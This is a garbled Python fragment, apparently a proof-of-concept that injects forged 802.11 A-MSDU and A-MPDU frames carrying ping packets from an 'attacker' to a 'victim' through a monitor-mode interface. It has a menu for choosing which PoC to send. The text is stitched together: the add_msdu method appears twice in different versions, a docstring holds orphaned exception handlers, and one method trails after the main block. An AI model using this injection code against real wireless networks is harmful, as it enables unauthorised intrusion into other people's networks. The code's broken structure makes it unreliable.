def add_msdu(self, msdu, msdu_len=-1):
# Default msdu len
if msdu_len == -1:
msdu_len = len(msdu)
mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS
# print the length of the padding
print('MPDU length: {mpdu_len}')
if mpdu_len % 4 != 0:
frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
printd("Padding added: ", Level.INFO)
#for character in str(frame_padding):
#print "\\x",character.encode('hex'), #does not work in python3
#printd("", Level.INFO)
else:
frame_padding = ""
printd("No padding added", Level.INFO)
sys.stdout.flush()
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111,
rev=True,
initCrc=0x00,
xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(self.dot11hdr / msdu))
# the packet alreacy contains the 'rt' and the 'dot11hdr', so I add the other things
self.data = self.data / msdu / maccrc / frame_padding
def main_amsdu():
count = 1
ip_count = 0
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
amsdu_pkt = AMSDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B', 0x02)
printd(clr(Color.YELLOW, "AMSDU Radiotap (rt):"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt.rt))
#for character in str(amsdu_pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
#print "\\x",character.encode('hex'), #does not work in python3
#sys.stdout.flush()
print("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "AMSDU dot11hdr:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU
amsdu_pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt))
sys.stdout.flush()
printd(clr(Color.YELLOW, "AMSDU data:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(amsdu_pkt.data))
sys.stdout.flush()
#for character in str(amsdu_pkt.data):
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
print("", Level.INFO) #print a linefeed
# send the packet a number of times
for i in range(0, 10):
# send the packet
amsdu_pkt.send() #the interface has to be in monitor mode
printd("AMSDU packet sent", Level.INFO)
time.sleep(0.1)
def add_msdu(self, msdu, msdu_len=-1):
# Default msdu len
if msdu_len == -1:
msdu_len = len(msdu)
mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS
# print the length of the padding
#print 'MPDU length: ', mpdu_len #this worked in python2
print('MPDU length: {mpdu_len}')
if mpdu_len % 4 != 0:
frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
printd("Padding added: ", Level.INFO)
#for character in str(frame_padding):
#print "\\x",character.encode('hex'), #does not work in python3
#printd("", Level.INFO)
else:
frame_padding = ""
#printd("No padding added", Level.INFO)
sys.stdout.flush()
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111,
rev=True,
initCrc=0x00,
xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(self.dot11hdr / msdu))
delim_sig = 0x4E
#print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack(
'<HBB', mpdu_len, crc, delim_sig
) #'pack' returns a string containing the given values, packed according to the given format
#hexdump(ampdu_header)
self.data = self.data / ampdu_header / self.dot11hdr / msdu / maccrc / frame_padding
self.num_subframes += 1
def main():
count = 1
ip_count = 1
# send the packet a number of times
for i in range(0, 10):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Create an empty packet (Radiotap + dot11 header)
pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B')
# dump the radiotap header
printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO)
hexdump.hexdump(bytes(pkt.rt), result='print')
printd("", Level.INFO) #print a linefeed
# print the radiotap headerin this format:
# "\x00\x00\x12\x00\x2e\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6c\x62\x27\x6c\x5c\x74\x27\xc0\x00\xc0\x01\x00\x00"
for my_bytes in bytes(pkt.rt):
print(''.join('\\x{:02x}'.format(my_bytes)), end='', flush=True)
printd("", Level.INFO) #print a linefeed
printd("", Level.INFO) #print a linefeed
# print the 802.11 header
printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO)
hexdump.hexdump(bytes(pkt.dot11hdr), result='print')
sys.stdout.flush()
# add an MSDU to the packet
pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))))
sys.stdout.flush()
printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"),
Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(pkt.data))
sys.stdout.flush()
#for character in str(pkt.data):
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
#print("", Level.INFO) #print a linefeed
# send the packet
pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
def main_ampdu():
# "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/
#session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 2):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B', 0x02)
printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt.rt)) #this was valid for python2
#hexdump.hexdump(bytes(ampdu_pkt.rt))
#for character in str(ampdu_pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
#print "\\x",character.encode('hex'), #does not work in python3
#sys.stdout.flush()
print("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU to the AMPDU
ampdu_pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
ampdu_pkt.add_padding(8)
printd(
clr(Color.YELLOW,
"AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
#sys.stdout.flush()
#hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
sys.stdout.flush()
#hexdump.hexdump('\x00'*16)
#hexdump.hexdump("Hello world")
hexdump.hexdump(container)
sys.stdout.flush()
#for character in container:
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
print("", Level.INFO) #print a linefeed
# send the packet a number of times
for i in range(0, 10):
# send the packet
ampdu_pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
"""
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
"""
if __name__ == "__main__":
try:
#pocnum = raw_input("option 1: send normal packets. " # this was valid in Python2
# "option 2: send AMSDUs. "
# "option 3: send AMPDUs. "
# "Choice: ")
pocnum = input(
"option 1: send normal packets. " # this is valid in Python3
"option 2: send AMSDUs. "
"option 3: send AMPDUs. "
"Choice: ")
if pocnum == "1":
main()
elif pocnum == "2":
main_amsdu()
elif pocnum == "3":
main_ampdu()
else:
printd("Invalid PoC number.", Level.CRITICAL)
except KeyboardInterrupt:
printd("\nExiting...", Level.INFO)
def dump_to_file(self):
with open('ampdu.bin', 'w') as f:
printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
f.write(str(self) * 250)